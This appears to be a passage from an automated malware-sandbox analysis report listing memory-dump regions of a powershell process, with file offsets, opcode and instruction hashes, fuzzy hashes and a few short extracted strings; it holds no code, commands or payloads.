                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7dc35346e8d9dc81ea19c22b75d5d16db0e9ca500dfdecb54af3195405855eff
                                                                                • Instruction ID: e1506c661e7dd74dce1eb281f2e9917656637a6447a57eff0834a45a2d5eb21d
                                                                                • Opcode Fuzzy Hash: 7dc35346e8d9dc81ea19c22b75d5d16db0e9ca500dfdecb54af3195405855eff
                                                                                • Instruction Fuzzy Hash: 91F04072E043505FCB769578994229A7BA19B872A071B06AACE426F712C421AC03C7E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2437014690.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_71d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9111b0c6c147197afebd5ac1e594e9f502bdf1be6a816e354a8962d96ba72d4a
                                                                                • Instruction ID: 6691ae47cd805a47ffc48a93b520d1a56881fc07cbba31ec25ca59c5c39b4d85
                                                                                • Opcode Fuzzy Hash: 9111b0c6c147197afebd5ac1e594e9f502bdf1be6a816e354a8962d96ba72d4a
                                                                                • Instruction Fuzzy Hash: 9AF06272405344AEE7208A1AC9C4BA2FFA8EB55734F18C55AED484E286C2799C85CAB1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq
                                                                                • API String ID: 0-801068408
                                                                                • Opcode ID: 8050d82976266c0f669092773eb173e59a1cfada203f1868c5493cdc8b6a0ff1
                                                                                • Instruction ID: c276696c2b19e11007bf30ab108b2e2cef8db61fb44cb48f9225ac97970c438d
                                                                                • Opcode Fuzzy Hash: 8050d82976266c0f669092773eb173e59a1cfada203f1868c5493cdc8b6a0ff1
                                                                                • Instruction Fuzzy Hash: 93A16732F043548FD7658A79981166BBBE6AFC2310B2A84BFDE45CB291DE35CC41C7A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $kq$$kq$$kq$$kq
                                                                                • API String ID: 0-2881790790
                                                                                • Opcode ID: a8ad87835a43a5fb20a2c389e4e0c852b6bce62766a1141c480e36b8bdbbf35a
                                                                                • Instruction ID: d4bfa9ea4496b2b7298b71bc6d34ee4ca816d2acdf0f3130c6f5194f08b48da1
                                                                                • Opcode Fuzzy Hash: a8ad87835a43a5fb20a2c389e4e0c852b6bce62766a1141c480e36b8bdbbf35a
                                                                                • Instruction Fuzzy Hash: BD216B32F103455BEBB8956A8C48B23B6D65BC4325F35852AEE05CB382DF39CE40C3A1